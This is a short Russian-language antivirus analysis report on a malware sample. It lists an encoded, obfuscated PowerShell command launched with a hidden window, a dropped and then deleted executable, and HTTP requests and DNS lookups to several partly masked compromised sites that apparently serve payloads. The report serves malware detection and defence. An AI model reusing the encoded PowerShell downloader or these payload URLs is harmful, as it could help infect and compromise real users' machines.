Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABUAHgAaQB2ADMAZgBnAD0AKAAnAEwAawAnACsAJwA2ACcAKwAoACcAMwB6ACcAKwAnAHoAcgAnACkAKQA7ACQAWgB6AGMAMwB5AGsAdAA9ACQAWABsAF8AMQBlAGQAcwAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\ayb6otz\wkgk0v7\w3i3h04.exe
Удаляет следующие файлы
- %HOMEPATH%\ayb6otz\wkgk0v7\w3i3h04.exe
Подменяет следующие файлы
- %HOMEPATH%\ayb6otz\wkgk0v7\w3i3h04.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.ge##rt.com/atrabiliary/yfH/
- http://www.dm##and.com/wp-admin/4k/
- http://www.dm##and.com/cgi-sys/suspendedpage.cgi
- http://fo###erteam.com/foulgerteam.com/i/
- http://am###sdh.org/coaid/0g/
- http://www.ch###esze.com/content/z0lGKS/
- http://www.ch###esze.com/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK ge##rt.com
- DNS ASK dm##and.com
- DNS ASK ze####inance.com
- DNS ASK my###dology.com
- DNS ASK fo###erteam.com
- DNS ASK am###sdh.org
- DNS ASK ch###esze.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABUAHgAaQB2ADMAZgBnAD0AKAAnAEwAawAnACsAJwA2ACcAKwAoACcAMwB6ACcAKwAnAHoAcgAnACkAKQA7ACQAWgB6AGMAMwB5AGsAdAA9ACQAWABsAF8AMQBlAGQAcwAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)
